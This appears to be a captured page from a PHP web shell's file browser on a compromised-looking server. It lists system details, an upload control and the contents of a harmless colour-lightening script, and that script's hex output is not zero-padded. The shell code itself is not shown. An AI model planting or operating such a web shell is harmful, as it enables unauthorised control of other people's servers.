( ′∀`)σ≡σ☆))Д′)レ(゚∀゚;)ヘ=З=З=Зε≡(ノ´_ゝ`)ノ HEX
HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux mail.thebrand.ai 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: /var/www/html/includes/getColorVariation.php
<?php
$hex_color = "#cc0000";
list($r, $g, $b) = sscanf($hex_color, "#%02x%02x%02x");
$amount_light = 50;
//Make color lighter
$r = min(255, $r + $amount_light);
$g = min(255, $g + $amount_light);
$b = min(255, $b + $amount_light);
$hex_color_light = "#".dechex($r).dechex($g).dechex($b);

list($r, $g, $b) = sscanf($hex_color_light, "#%02x%02x%02x");
$amount_light = 50;
//Make color lighter
$r = min(255, $r + $amount_light);
$g = min(255, $g + $amount_light);
$b = min(255, $b + $amount_light);
$hex_color_light2 = "#".dechex($r).dechex($g).dechex($b);


echo "<br>light (in hex) $hex_color_light2: ".$hex_color_light;?>